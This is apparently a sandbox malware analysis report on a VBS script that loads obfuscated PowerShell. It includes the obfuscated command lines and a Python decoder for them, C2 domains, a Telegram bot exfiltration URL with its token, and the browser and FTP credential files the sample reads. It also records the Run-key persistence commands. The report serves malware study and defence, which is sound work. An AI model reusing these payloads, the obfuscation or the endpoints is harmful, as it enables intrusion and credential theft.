            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Damspils = """ReFGruKonNacSktDoiKloUtnHe GrHshTPuBMi Mi{G ud ho Pr HvpflaRurNoaVamSo(st[DeSBotOrrMoiAnnBogPh]Di`$HiHStSBl)Ro;Pa Ni vn Ra Sa`$InBvoyUntAlesisBe Sp=Af UnNBreGrwKr-ByOCabOmjcyeUncBytOr PrbGlyFotPreSt[Be]Av Fa(fo`$AlHDeSSt.MiLQueRinPegBatHahGe Te/Un Ev2Me)Ta;Sm Op Fo St ChFmooKurUn(Sc`$HaiDr=Di0Pr;Is Ly`$HaiPo Sn-OvlKitCo Dy`$FlHSpSpe.GyLSkeOknbrgCatSahAl;Ko Sp`$DeiTr+Da=sk2Ak)La{Ma Sp Wh Ko Gu Va St Ba Pt`$PrBUdySttAueBesUr[Hy`$OdiSt/Kf2Ar]Re Ka=De Ku[AbcFooTonPavToeUdrCotFu]je:Bo:SpTstoSkBGlyGrtPreUr(Su`$UiHDeSNo.caSpruCobOvsPotwerHyiLinTrgCu(St`$MaiMa,Le Di2My)In,Pa Pa1Az6No)Ju;Co Ba Rn`$GaBOpyTitSteBosDi[Au`$EliAd/As2Ma]Pa Ve=Tr Sh(Ci`$SpBAayTetOxeBosIn[Ra`$MaiOm/Ba2Am]Bo Do-TibDixGloMorPa En2Fr0ba1Om)He;Au Vg Re Mr as}Mi Mi[SuSKktTurspiFanMagOv]En[GrSInyHysCltCaeStmIn.StTPoeUdxUntKo.reEAfnThcUnoTrdariUnnRegTa]Be:Ka:OvASlSTrCPaIExIBr.DiGSaehatMiSOutAlrSpiTanSugBi(me`$ElbInyEttIneMasSu)Ci;By}Mi`$InRHaeGrcOvaGilSycTeiOptRhrRiaHitdieMe0Pi=LiHomTExBOv Sn'Ho9ThASnBVi0VaBAaARaBCiDplACoCGyAVo4OpEIn7WeAKoDPeAEx5OpAFr5Cu'bi;Ge`$EmRAfeBycDiaEmlUncheiAptrirExaHetsteBe1lb=GuHDaTGeBSk Le'Di8Rg4LyApr0InAViASpBReBBoACo6SiBSlAKoAFi6ScABrFMiBLiDSiEMo7Be9laEUnASt0BiAKo7WrFCaAUnFStBHoECh7Ra9ChCPaABe7SkBadAPaATr8HuAKeFskADoCkn8Sk7MaAPr8RoBCrDFoAPe0MeBLaFScAJuCNo8Te4BoAReCSpBDiDdeAun1BiATi6TuAWeDHeBIlARi'Im;Ga`$HoRIseMicCaaChlPocFoiTrtberDeaFltFoeXx2ma=RuHMeTOvBNo Pi'Ru8LyERaAObCMyBAnDUn9In9AnBIdBbaAHy6WiAspAUn8Pa8JoABiDFlASvDFaBDaBCiAbiCHaBjaAPrBanAFo'Ju;Sa`$MtRThehicHyaUnlCycSeiDetNorSnaEbtTeeDy3Ge=urHMaTPhBBu 
Ex'Si9AdABeBNa0OlBMiASkBBoDBrAMuCUnARu4HoECh7Be9SyBFoBusCOpAUn7FaBUnDSpAOp0haAAn4KiAReCSrESm7Ga8Ro0DoAGl7TiBfoDGlASiCYoBSuBDeAJo6FlBAi9Af9MaAKiASpCSaBFjBGaBFrFBnAsw0OvAWeACuAteCToBLaAOuEFo7Sa8Se1InATi8SpAEc7DeAFoDSaAOp5FoAAlCGi9CyBFiAReCKlADrFFe'Ko;Be`$ToRMaePrcNoaInlRecEtiMatInrWiaKotAleEx4Ga=FoHTiTBaBWe Un'OvBTrAHeBinDIlBPyBFaAEv0KoABe7AmAStEUn'Fo;Co`$SkRSeeVacobabrlincRyiDetGrrWhaChtFoeRa5Ba=ccHSpTAnBPr Au'In8VgEFnAPaCYpBMoDOm8Kl4RaAMu6DeACoDHuBHiCSnAHy5LoAGeCUd8Th1TrAFl8InAEn7TaAUnDBuAel5AfAKaCRe'Un;Af`$GaRDeeBocmyaMelMacKviOptMirHeaTrtPaeSa6Pl=HeHOmTKiBUl Ea'Ku9svBUb9LiDGe9NeASuBFe9foANaClaAInAHeAFy0FoAKh8CaATr5un8To7FlAEn8KoAHe4DoABiCdiEBl5HiEOi9Ha8Po1MaAfl0alATaDDiACiCAf8GiBSpBCa0ra9BuADuAAe0UdACaESjETr5GoEHa9Op9Ma9StBexCWoAStBKrARn5BeAFl0AmAarAAf'Uk;Jo`$TeRBaeRecNaaHolDrcJeiOmtImrOuaNotSoeKo7Re=SuHXyTRuBTa Tr'na9LiBFoBScCHuADe7AaBGrDJuACa0foAGi4AnAReCGlEYo5MaEKa9Or8Mi4deAIn8MoASj7EuAth8FuAFoEimAMeCUnABeDGi'Ty;do`$TeRFleVacInaMelUocPuiOvtWirLeaKntMneAn8St=TiHPaTPaBSt St'Tn9LiBChANoCLyAJoFLyAAs5DiAFaCViADmABoBCaDOpALvCGaAHiDPr8HaDVaAPoCOvAPo5TaANoCcrAPrEScACi8MeBApDnoAKaCLy'St;Un`$SmRFieSicSeaSelDicPaivatRarTeaPotReeDr9Ov=MeHDoTSiBSt ca'Ta8os0GlANo7Ro8Ch4PeATrCreAOp4BeASt6aaBAaBIlBAl0En8st4HoAFe6YeARaDlsBExCUnAUn5PrAPoCde'Fo;Ro`$StDnoeGomFgaSugcynKieretEviAmzPaaLmbBllUdePl0Co=PaHAlTAgBKi ma'Ba8Dr4noBSy0Sa8ToDHuAFrCTeAT
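The command lines above show two obfuscation layers. Stage 1 (the `$Badeanstalt` and `$Damspils` here-strings handed to the first powershell.exe) buries the real script in filler characters; stage 2 (the script beginning `Function HTB`) stores every string as hex, XORs each byte with 229, and runs decoded code through `&($Styrketrne7) $Leucifer0`, an indirect call whose command name is itself a decoded string. The Python below is an added example, not code from the report or from the sample, that recovers both layers on fragments copied from the lines above. The stage-1 rule (drop the backtick escapes, keep every third character from offset 2) is an assumption inferred from the visible text and checked against it, because the report truncates the stage-1 decoder; the `htb` port follows the visible stage-2 function directly.

```python
import re

XOR_KEY = 229  # the "-bxor 229" constant inside the sample's HTB function

# Constructed inputs, copied from the command lines quoted above. STAGE1_* come from
# the here-string given to the first powershell.exe; STAGE2_SNIPPET holds assignments
# and one indirect call from the script it produces for the SysWOW64 powershell.exe.
STAGE1_HEAD = "reFLiuEfnBrcExtApiHjoStnBu HyHFlTDuBSp su{"
STAGE1_ASSIGN = ("Ga`$DeHBrdSalUncIr0Sk=KrHOuTBeBAf Ry'BeBRe6te9SpCBe9Be6Pr9Gr1js8Et0"
                 "Am8In8SeCEnBCa8co1In8Ta9Pr8Cr9De'Sy;")
STAGE2_SNIPPET = (
    "$Hdlc0=HTB 'B69C96918088CB818989';"
    "$Hdlc1=HTB 'A88C86978A968A8391CBB28C8BD6D7CBB08B96848380AB84918C9380A880918D8A8196';"
    "$Hdlc2=HTB 'A28091B5978A86A4818197809696';"
    "$Styrketrne4=HTB 'B38C9791908489A489898A86';"
    "$Styrketrne5=HTB '8B91818989';"
    "$Styrketrne6=HTB 'AB91B5978A91808691B38C9791908489A880888A979C';"
    "$Styrketrne7=HTB 'ACA0BD';$Styrketrne8=HTB 'B9';"
    "$Leucifer0 =HTB 'C193908B88C5D8C5CDBEA49595A18A88848C8BB8DFDF"
    "A6909797808B91A18A88848C8BCBA28091A49696808887898C8096CDCC"
    "C599C5B28D809780C8AA878F808691C59EC5"
    "C1BACBA2898A878489A49696808887899CA684868D80C5C8A48B81C5"
    "C1BACBA98A8684918C8A8BCBB695898C91CDC1B6919C978E8091978B80DDCC"
    "BEC8D4B8CBA09490848996CDC1AD818986D5CCC598CCCB"
    "A28091B19C9580CDC1AD818986D4CC';"
    "&($Styrketrne7) $Leucifer0;"
)


def unstride(blob, stride=3, offset=2):
    """Stage-1 decoder. ASSUMPTION: the report cuts the original decoder off, so the
    rule (remove PowerShell's backtick escapes, then keep every third character
    starting at offset 2) was inferred by hand from the visible text."""
    return blob.replace("`", "")[offset::stride]


def htb(hexstring, key=XOR_KEY):
    """Port of the sample's HTB: hex-decode, XOR every byte with 229, read as ASCII."""
    return bytes(b ^ key for b in bytes.fromhex(hexstring)).decode("ascii")


ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*HTB\s+'([0-9A-Fa-f]+)'")
CALL_RE = re.compile(r"&\(\$(\w+)\)\s+\$(\w+)")


def decode_assignments(script):
    """Every `$name = HTB '<hex>'` in the script, decoded into a name -> string table."""
    return {name: htb(hexs) for name, hexs in ASSIGN_RE.findall(script)}


def inline_strings(statement, table):
    """Substitute decoded literals for the variables a decoded statement references."""
    for name in sorted(table, key=len, reverse=True):  # longest names first
        statement = statement.replace("$" + name, "'" + table[name] + "'")
    return statement


def resolve_calls(script, table):
    """`&($X) $Y` is an indirect call: $X names the command, $Y holds decoded code."""
    return [(table.get(cmd, "$" + cmd), inline_strings(table.get(arg, "$" + arg), table))
            for cmd, arg in CALL_RE.findall(script)]


def decode_chain(stage1_fragment):
    """Stage 1 -> stage 2 -> plaintext, for a fragment such as STAGE1_ASSIGN."""
    return decode_assignments(unstride(stage1_fragment))


if __name__ == "__main__":
    print(unstride(STAGE1_HEAD))
    table = decode_assignments(STAGE2_SNIPPET)
    for name, value in table.items():
        print(f"{name:14} {value}")
    for cmd, code in resolve_calls(STAGE2_SNIPPET, table):
        print(cmd, "->", code)
```

Run as a script it prints the decoded table (System.dll, Microsoft.Win32.UnsafeNativeMethods, GetProcAddress, VirtualAlloc, ntdll, NtProtectVirtualMemory, IEX and a lone backslash) and resolves the indirect call to IEX of a statement that finds System.dll in the GAC and reflects Microsoft.Win32.UnsafeNativeMethods, the customary first step for resolving Win32 APIs from PowerShell without a visible Add-Type. The same `decode_assignments` call applied to the full stage-2 script would recover the remaining `$Leucifer*` bodies, including the VirtualAlloc and NtProtectVirtualMemory delegates the string table already names.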
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0751D164 CreateNamedPipeW,

            Stealing of Sensitive Information

Source: Yara match | File source: 0000000D.00000002.7460473014.000000001D6D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.7449931137.000000001F1C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: Yara match | File source: 0000000D.00000002.7460473014.000000001D6D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

Source: Yara match | File source: 0000000D.00000002.7460473014.000000001D6D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.7449931137.000000001F1C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | 211 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Web Service | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | 221 Scripting | 11 Registry Run Keys / Startup Folder | 12 Process Injection | 11 Deobfuscate/Decode Files or Information | 11 Input Capture | 116 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | Exfiltration Over Bluetooth | 1 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | 21 Command and Scripting Interpreter | Logon Script (Windows) | 11 Registry Run Keys / Startup Folder | 221 Scripting | 1 Credentials in Registry | 22 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | Automated Exfiltration | 11 Encrypted Channel | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | 1 PowerShell | Logon Script (Mac) | Logon Script (Mac) | 3 Obfuscated Files or Information | NTDS | 1 Process Discovery | Distributed Component Object Model | 11 Input Capture | Scheduled Transfer | 1 Non-Standard Port | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 241 Virtualization/Sandbox Evasion | SSH | 1 Clipboard Data | Data Transfer Size Limits | 3 Non-Application Layer Protocol | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 241 Virtualization/Sandbox Evasion | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | 114 Application Layer Protocol | Jamming or Denial of Service | Abuse Accessibility Features |
External Remote Services | Scheduled Task | Startup Items | Startup Items | 12 Process Injection | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
Behavior Graph ID: 755530 | Sample: IMG_2022028022-0120.vbs | Start date: 28/11/2022 | Architecture: WINDOWS | Score: 100
Network (top level): myfrontmannyfive.ddns.net; backupfrontmanny.duckdns.org; 6 other IPs or domains
Signatures (top level): Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Yara detected GuLoader; 6 other signatures

Process tree:
wscript.exe (started): Wscript starts Powershell (via cmd or directly); Obfuscated command line found; Very long command line found
  powershell.exe (started): Very long command line found
    powershell.exe (started)
      ieinstal.exe (started): myfrontmannyfive.ddns.net 37.0.14.209, 4939, 49815, 49818 WKD-ASIE Netherlands; backupfrontmanny.duckdns.org 84.38.134.104, 4939, 49814, 49816 DATACLUBLV Latvia; sinopbisikletkiralama.com 172.67.169.218, 49811, 80 CLOUDFLARENETUS United States; Creates multiple autostart registry keys; Tries to detect Any.run
        wscript.exe (started): Wscript starts Powershell (via cmd or directly); Obfuscated command line found; Very long command line found
          powershell.exe (started): Tries to detect Any.run
            CasPol.exe (started): api.telegram.org 149.154.167.220, 443, 49881 TELEGRAMRU United Kingdom; Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Creates multiple autostart registry keys; 4 other signatures
            CasPol.exe (started): Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
            conhost.exe (started)
    conhost.exe (started)

Source | Detection | Scanner | Label
IMG_2022028022-0120.vbs | 0% | Virustotal |
IMG_2022028022-0120.vbs | 0% | ReversingLabs |
No Antivirus matches

Source | Detection | Scanner | Label
myfrontmannyfive.ddns.net | 1% | Virustotal |
backupfrontmanny.duckdns.org | 3% | Virustotal |
sinopbisikletkiralama.com | 9% | Virustotal |

Source | Detection | Scanner | Label
http://sinopbisikletkiralama.com/Bichloride.vbs | 0% | Avira URL Cloud | safe

Name | IP | Active | Malicious | Antivirus Detection | Reputation
myfrontmannyfive.ddns.net | 37.0.14.209 | true | true | unknown |
backupfrontmanny.duckdns.org | 84.38.134.104 | true | true | unknown |
sinopbisikletkiralama.com | 172.67.169.218 | true | false | unknown |
api.telegram.org | 149.154.167.220 | true | false | | high
f65kcg.am.files.1drv.com | unknown | unknown | false | | high
onedrive.live.com | unknown | unknown | false | | high
f64nqg.am.files.1drv.com | unknown | unknown | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://sinopbisikletkiralama.com/Bichloride.vbs | true | Avira URL Cloud: safe | unknown
https://api.telegram.org/bot2135733177:AAGBiQMSb9sct4MUL0kpdpB0pPO3n3AKBfA/sendDocument | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
37.0.14.209 | myfrontmannyfive.ddns.net | Netherlands | 198301 | WKD-ASIE | true
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
84.38.134.104 | backupfrontmanny.duckdns.org | Latvia | 52048 | DATACLUBLV | true
172.67.169.218 | sinopbisikletkiralama.com | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox Version: 36.0.0 Rainbow Opal
Analysis ID: 755530
Start date and time: 2022-11-28 20:42:33 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 16m 29s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: IMG_2022028022-0120.vbs
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
Run name: Suspected Instruction Hammering
Number of new started processes analysed: 22
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winVBS@16/7@22/4
EGA Information:
• Successful, ratio: 75%
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
                      Cookbook Comments:
                      • Found application associated with file extension: .vbs
                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                      • Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, UserOOBEBroker.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, backgroundTaskHost.exe, MoUsoCoreWorker.exe, svchost.exe, UsoClient.exe
                      • TCP Packets have been reduced to 100
                      • Excluded IPs from analysis (whitelisted): 13.107.42.13, 13.107.42.12
                      • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, client.wns.windows.com, odc-web-geo.onedrive.akadns.net, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, wdcp.microsoft.com, l-0004.l-msedge.net, wdcpalt.microsoft.com, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, l-0003.l-msedge.net, login.live.com, odc-am-files-geo.onedrive.akadns.net, am-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, odc-am-files-brs.onedrive.akadns.net
                      • Execution Graph export aborted for target powershell.exe, PID 6472 because it is empty
• Not all processes were analyzed; the report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
20:45:16 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Hugi %tullio% -w 1 $Unrejoicing41=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Expansiveness;%tullio% ($Unrejoicing41)
20:45:25 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Hugi %tullio% -w 1 $Unrejoicing41=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Expansiveness;%tullio% ($Unrejoicing41)
